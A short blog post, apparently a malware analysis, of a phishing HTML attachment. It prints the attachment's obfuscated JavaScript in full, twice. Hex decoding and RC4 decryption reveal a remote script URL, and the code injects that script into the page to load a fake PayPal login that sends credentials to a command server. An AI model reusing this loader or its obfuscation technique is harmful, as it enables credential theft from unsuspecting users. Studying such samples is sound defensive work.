This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake paypal site, and the information entered is sent to the c2 server. Last re-direct happens to the actual paypal site so that the user doesnt suspects anything.
Syntax Highlighting:
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>
<body><script>
function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f; apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}
function f8ce53222(ll1u8137, rx3oj311) {
var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
return jxl077g53
}
var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
*/ p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser
var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");
*/ zgdz: "script"
var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
*/ jkl6lg: "head"
document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
*/ this will result in: head > script > JS
</script>
</body>
</html>
Syntax Highlighting:
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>
<body><script>
function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f; apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}
function f8ce53222(ll1u8137, rx3oj311) {
var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
return jxl077g53
}
var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
*/ p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser
var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");
*/ zgdz: "script"
var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
*/ jkl6lg: "head"
document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
*/ this will result in: head > script > JS
</script>
</body>
</html>
No comments:
Post a Comment